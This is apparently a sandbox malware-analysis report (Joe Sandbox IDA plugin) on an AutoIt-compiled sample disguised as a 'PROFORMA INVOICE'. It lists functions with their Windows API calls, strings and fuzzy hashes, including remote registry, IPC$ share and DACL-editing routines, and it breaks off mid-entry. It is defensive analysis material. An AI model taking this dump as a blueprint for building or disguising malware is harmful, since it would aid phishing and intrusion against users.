Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 618562835-2268648507
Opcode ID: 8d5f7c32f492bc68dd14606a917a23a68694789d8153499f3eadbb30701416b0
Instruction ID: 0fabfb474fc48e8dc2489b0208e7b82afe1aa0da464c4d92ae8cb4dc52d0a8bb
Opcode Fuzzy Hash: 8d5f7c32f492bc68dd14606a917a23a68694789d8153499f3eadbb30701416b0
Instruction Fuzzy Hash: C1416072900218BACF14FBE0DD86EEEB778AF15740F100065F54577092EA796F49EBA0

Function 00FAD0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00FAD0D8
__swprintf.LIBCMT ref: 00FAD0FA
CreateDirectoryW.KERNEL32(?,00000000), ref: 00FAD137
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00FAD15C
_memset.LIBCMT ref: 00FAD17B
_wcsncpy.LIBCMT ref: 00FAD1B7
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00FAD1EC
CloseHandle.KERNEL32(00000000), ref: 00FAD1F7
RemoveDirectoryW.KERNEL32(?), ref: 00FAD200
CloseHandle.KERNEL32(00000000), ref: 00FAD20A

Strings

\??\%s, xrefs: 00FAD0F4
:, xrefs: 00FAD11B
\, xrefs: 00FAD110

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 51c7bd33d36a245477a031f62f292151f21d9bf2db0e7f7732ffda6aa5d0d7f1
Instruction ID: 9eb8820960671c12b88d478dc62438baa542a91df7495f7422951f1a6f5dd6a1
Opcode Fuzzy Hash: 51c7bd33d36a245477a031f62f292151f21d9bf2db0e7f7732ffda6aa5d0d7f1
Instruction Fuzzy Hash: 6631B2B2900149ABDB21DFA0CC89FEB77BDEF89740F1040B6F60AD6160EB749645DB24

Function 00F987CD Relevance: 22.7, APIs: 15, Instructions: 210COMMONLIBRARYCODE

Download Yara Rule

APIs

_copy_environ.LIBCMT ref: 00F9882D
___wtomb_environ.LIBCMT ref: 00F9884F

Part of subcall function 00F87C0E: __getptd_noexit.LIBCMT ref: 00F87C0E

__malloc_crt.LIBCMT ref: 00F98875
__malloc_crt.LIBCMT ref: 00F98892
_free.LIBCMT ref: 00F988C9
__recalloc_crt.LIBCMT ref: 00F98902
__recalloc_crt.LIBCMT ref: 00F98947
_strlen.LIBCMT ref: 00F98973
__calloc_crt.LIBCMT ref: 00F9897D
_strlen.LIBCMT ref: 00F9898C
SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 00F989BA
_free.LIBCMT ref: 00F989D4
_free.LIBCMT ref: 00F989E1
_free.LIBCMT ref: 00F989F3
__invoke_watson.LIBCMT ref: 00F98A0D

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
String ID:
API String ID: 884005220-0
Opcode ID: 64442ef91d3eccdc8a08e13f2b3bff32b0e02d259219515b4da29e90bfdef420
Instruction ID: 3d8d38bbef0393369093cd4b187e884707e18cb43426e6169103b6effb50d911
Opcode Fuzzy Hash: 64442ef91d3eccdc8a08e13f2b3bff32b0e02d259219515b4da29e90bfdef420
Instruction Fuzzy Hash: 8161A172D04315AFFF216F64DC42BA977A8AB027B1F200129F841AB1C5DF39D942A7A5

Function 00FCE731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00FCE754
GetFileSize.KERNEL32(00000000,00000000), ref: 00FCE76B
GlobalAlloc.KERNEL32(00000002,00000000), ref: 00FCE776
CloseHandle.KERNEL32(00000000), ref: 00FCE783
GlobalLock.KERNEL32(00000000), ref: 00FCE78C
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00FCE79B
GlobalUnlock.KERNEL32(00000000), ref: 00FCE7A4
CloseHandle.KERNEL32(00000000), ref: 00FCE7AB
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00FCE7BC
OleLoadPicture.OLEAUT32(?,00000000,00000000,00FED9BC,?), ref: 00FCE7D5
GlobalFree.KERNEL32(00000000), ref: 00FCE7E5
GetObjectW.GDI32(?,00000018,000000FF), ref: 00FCE809
CopyImage.USER32(?,00000000,?,?,00002000), ref: 00FCE834
DeleteObject.GDI32(00000000), ref: 00FCE85C
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00FCE872

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: e618dc6c6dfd01ad3f8dac02941d766e8dd66e48aeaa65384a284e529e96fb13
Instruction ID: acceebe1b00da41a77fe2c7649f84ef6f51eb14f99ac208e9a1fa09036a7dd74
Opcode Fuzzy Hash: e618dc6c6dfd01ad3f8dac02941d766e8dd66e48aeaa65384a284e529e96fb13
Instruction Fuzzy Hash: 05415A75A00249FFDB119F65CD89EAE7BB9EF89721F108058F916DB2A0C7319D40EB20

Function 00FB05F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00FB076F
_wcscat.LIBCMT ref: 00FB0787
_wcscat.LIBCMT ref: 00FB0799
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FB07AE
SetCurrentDirectoryW.KERNEL32(?), ref: 00FB07C2
GetFileAttributesW.KERNEL32(?), ref: 00FB07DA
SetFileAttributesW.KERNEL32(?,00000000), ref: 00FB07F4
SetCurrentDirectoryW.KERNEL32(?), ref: 00FB0806

Strings

*.*, xrefs: 00FB0845

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 28ea9eb9370cc99a05a7e6043e7f0425e7342e645eed1357ed12a036d1c2e05b
Instruction ID: 3a1f535641fa3fa5f4c7eeba9b065778ad20d8b5b545c725daedcf12350b8b03
Opcode Fuzzy Hash: 28ea9eb9370cc99a05a7e6043e7f0425e7342e645eed1357ed12a036d1c2e05b
Instruction Fuzzy Hash: 908180729043459FCB24EF25C8459ABB7E9BBD8310F14882AF889D7250EE34D944AF92

Function 00FCEEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00F7B35F

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00FCEF3B
GetFocus.USER32 ref: 00FCEF4B
GetDlgCtrlID.USER32(00000000), ref: 00FCEF56
_memset.LIBCMT ref: 00FCF081
GetMenuItemInfoW.USER32 ref: 00FCF0AC
GetMenuItemCount.USER32(00000000), ref: 00FCF0CC
GetMenuItemID.USER32(?,00000000), ref: 00FCF0DF
GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00FCF113
GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00FCF15B
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00FCF193
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00FCF1C8

Strings

0, xrefs: 00FCF079

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 37442c486cae1512c5b5b9568d1aea71bd4ebbc45d910dfa8f616281bd59f505
Instruction ID: dbf7ec8b3875fd2bf1643af9a57d3f855a8ff05e9da4546a8dbd9d5f433dd376
Opcode Fuzzy Hash: 37442c486cae1512c5b5b9568d1aea71bd4ebbc45d910dfa8f616281bd59f505
Instruction Fuzzy Hash: 5F818E71504306AFD720CF14C986FABBBEAFB88324F14452EF99497291D731D909EB92

Function 00F9A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F9ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00F9ABD7
Part of subcall function 00F9ABBB: GetLastError.KERNEL32(?,00F9A69F,?,?,?), ref: 00F9ABE1
Part of subcall function 00F9ABBB: GetProcessHeap.KERNEL32(00000008,?,?,00F9A69F,?,?,?), ref: 00F9ABF0
Part of subcall function 00F9ABBB: HeapAlloc.KERNEL32(00000000,?,00F9A69F,?,?,?), ref: 00F9ABF7
Part of subcall function 00F9ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00F9AC0E

Part of subcall function 00F9AC56: GetProcessHeap.KERNEL32(00000008,00F9A6B5,00000000,00000000,?,00F9A6B5,?), ref: 00F9AC62
Part of subcall function 00F9AC56: HeapAlloc.KERNEL32(00000000,?,00F9A6B5,?), ref: 00F9AC69
Part of subcall function 00F9AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00F9A6B5,?), ref: 00F9AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F9A8CB
_memset.LIBCMT ref: 00F9A8E0
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F9A8FF
GetLengthSid.ADVAPI32(?), ref: 00F9A910
GetAce.ADVAPI32(?,00000000,?), ref: 00F9A94D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F9A969
GetLengthSid.ADVAPI32(?), ref: 00F9A986
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00F9A995
HeapAlloc.KERNEL32(00000000), ref: 00F9A99C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F9A9BD
CopySid.ADVAPI32(00000000), ref: 00F9A9C4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F9A9F5
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F9AA1B
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F9AA2F

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 8b1909d4584d7451347a0d5534f0b20dc42dceb36d240291c891718507c79b6f
Instruction ID: e6dbc29d824db81340e8a11d8618cc2f37e9e76754fa6fff244b66e1e6cec885
Opcode Fuzzy Hash: 8b1909d4584d7451347a0d5534f0b20dc42dceb36d240291c891718507c79b6f
Instruction Fuzzy Hash: DC513C71900249EFEF10DF94DD89AEEBBB9FF04310F048119F915AB290DB359A05EBA1

Function 00FB9DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00FB9E36
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00FB9E42
CreateCompatibleDC.GDI32(?), ref: 00FB9E4E
SelectObject.GDI32(00000000,?), ref: 00FB9E5B
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00FB9EAF
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00FB9EEB
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00FB9F0F
SelectObject.GDI32(00000006,?), ref: 00FB9F17
DeleteObject.GDI32(?), ref: 00FB9F20
DeleteDC.GDI32(00000006), ref: 00FB9F27
ReleaseDC.USER32(00000000,?), ref: 00FB9F32

Strings

(, xrefs: 00FB9ED7

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 6bf6472ca2e73259791515a9c1b212ca58c3649e72c2cb0825ddd164095f5e9d
Instruction ID: 228fe3b590571fac61e96a85f6763eb96a87faa8997e7e47577ff7acce99d4c0
Opcode Fuzzy Hash: 6bf6472ca2e73259791515a9c1b212ca58c3649e72c2cb0825ddd164095f5e9d
Instruction Fuzzy Hash: 6D514976904349AFDB14CFA9CC85EAEBBB9EF48310F14841DFA59AB210C775A940DF60

Function 00FACC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 00FACCA3
LoadStringW.USER32(?,?,00000FFF,?), ref: 00FACCC5
__swprintf.LIBCMT ref: 00FACD1E
__swprintf.LIBCMT ref: 00FACD37
_wprintf.LIBCMT ref: 00FACDED
_wprintf.LIBCMT ref: 00FACE0B

Strings

Error: , xrefs: 00FACDB5
^ ERROR, xrefs: 00FACD8F
"%s" (%d) : ==> %s:%s%s, xrefs: 00FACDE8
"%s" (%d) : ==> %s:, xrefs: 00FACE06
Line %d (File "%s"):, xrefs: 00FACD18, 00FACD31

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-2391861430
Opcode ID: 1a5ded727caa6b83ea7e08bfcaecf60c766f65c951717110ad6e0faaaa33a078
Instruction ID: 533066f6461ea0bfa69e7afd0d4537d3c5098a81bfc751d889c925b0d96b8587
Opcode Fuzzy Hash: 1a5ded727caa6b83ea7e08bfcaecf60c766f65c951717110ad6e0faaaa33a078
Instruction Fuzzy Hash: CE518C72900109BACF25EBE0CD82EEEB778AF09304F100165F54576062EB796F59EBA1

Function 00FACA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00FACA8F
LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00FACAB0
__swprintf.LIBCMT ref: 00FACB09
__swprintf.LIBCMT ref: 00FACB22
_wprintf.LIBCMT ref: 00FACBCD
_wprintf.LIBCMT ref: 00FACBEB

Strings

Error: , xrefs: 00FACB95
"%s" (%d) : ==> %s:%s%s, xrefs: 00FACBC8
"%s" (%d) : ==> %s:, xrefs: 00FACBE6
^ ERROR , xrefs: 00FACB64
Line %d (File "%s"):, xrefs: 00FACB03, 00FACB1C

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-3420473620
Opcode ID: 12b602205832512f5280a255b0dbf67c823858d0d86494a06d33fe60b8b70b31
Instruction ID: 5c9c3bef75e07c2d52346b03f27e1871c22eea11e70c755f508a40ce589adaa8
Opcode Fuzzy Hash: 12b602205832512f5280a255b0dbf67c823858d0d86494a06d33fe60b8b70b31
Instruction Fuzzy Hash: 7251AE72900209AACF25FBE0CD82EEEB778AF05340F100165F54576062EB796F59EFA1

Function 00FA55BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FA55D7
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00FA5664
GetMenuItemCount.USER32(01021708), ref: 00FA56ED
DeleteMenu.USER32(01021708,00000005,00000000,000000F5,?,?), ref: 00FA577D
DeleteMenu.USER32(01021708,00000004,00000000), ref: 00FA5785
DeleteMenu.USER32(01021708,00000006,00000000), ref: 00FA578D
DeleteMenu.USER32(01021708,00000003,00000000), ref: 00FA5795
GetMenuItemCount.USER32(01021708), ref: 00FA579D
SetMenuItemInfoW.USER32(01021708,00000004,00000000,00000030), ref: 00FA57D3
GetCursorPos.USER32(?), ref: 00FA57DD
SetForegroundWindow.USER32(00000000), ref: 00FA57E6
TrackPopupMenuEx.USER32(01021708,00000000,?,00000000,00000000,00000000), ref: 00FA57F9
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00FA5805

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 98e9876ef906d5f4b5b76cb8c96ce3295c64bd984719dadb4420cba5d1eed2e7
Instruction ID: fc54074c523065d0c2f876b186a4b1c6e980728bacbdd6c0582b0e9d9234cbbc
Opcode Fuzzy Hash: 98e9876ef906d5f4b5b76cb8c96ce3295c64bd984719dadb4420cba5d1eed2e7
Instruction Fuzzy Hash: 407106B1A41609BFEB209F54CC89FAABF65FF42B64F240205F6156A2D0C7B56C10FB90

Function 00F9A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F9A1DC
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00F9A211
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00F9A22D
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00F9A249
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00F9A273
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00F9A29B
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F9A2A6
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F9A2AB

Strings

\IPC$, xrefs: 00F9A1F3
\CLSID, xrefs: 00F9A193
SOFTWARE\Classes\, xrefs: 00F9A17D

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1687751970-22481851
Opcode ID: fac0fc2f8136231e5d69bb6cc20b6ab9bf802b5c10d8eac7bdde763b7a51f708
Instruction ID: f190241d279ad2ec291c4488b6d061ad2031ed41df3b07029057ea5b6f8571e2
Opcode Fuzzy Hash: fac0fc2f8136231e5d69bb6cc20b6ab9bf802b5c10d8eac7bdde763b7a51f708
Instruction Fuzzy Hash: 3741E576C10229AADF21EBA4DC85DEDB7B8FF04710F044129F901B7161EB749E05EB90

Function 00FC3C06 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FC2BB5,?,?), ref: 00FC3C1D

Strings

HKEY_CURRENT_CONFIG, xrefs: 00FC3CC0
HKCC, xrefs: 00FC3CD1
HKU, xrefs: 00FC3D15
HKEY_CURRENT_USER, xrefs: 00FC3CE2
HKEY_CLASSES_ROOT, xrefs: 00FC3C96
HKCR, xrefs: 00FC3CAB
HKCU, xrefs: 00FC3CF3
HKEY_USERS, xrefs: 00FC3D04
HKEY_LOCAL_MACHINE, xrefs: 00FC3C6C
HKLM, xrefs: 00FC3C81

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 0469028eb14a8ae4ac68402063be0cef2079699b9c5ee5db7a8117db6b3ea362
Instruction ID: 375e69d74e95d122d679aca1b3f3c33002c98f25813f3eca68e92f38ef0a29ed
Opcode Fuzzy Hash: 0469028eb14a8ae4ac68402063be0cef2079699b9c5ee5db7a8117db6b3ea362
Instruction Fuzzy Hash: 1641A43450024E8BCF01EF10DD42FEA3769BF55390F108859FC965B2A6EB799E1AEB11

Function 00FA25B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00FD36F4,00000010,?,Bad directive syntax error,00FFDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00FA25D6
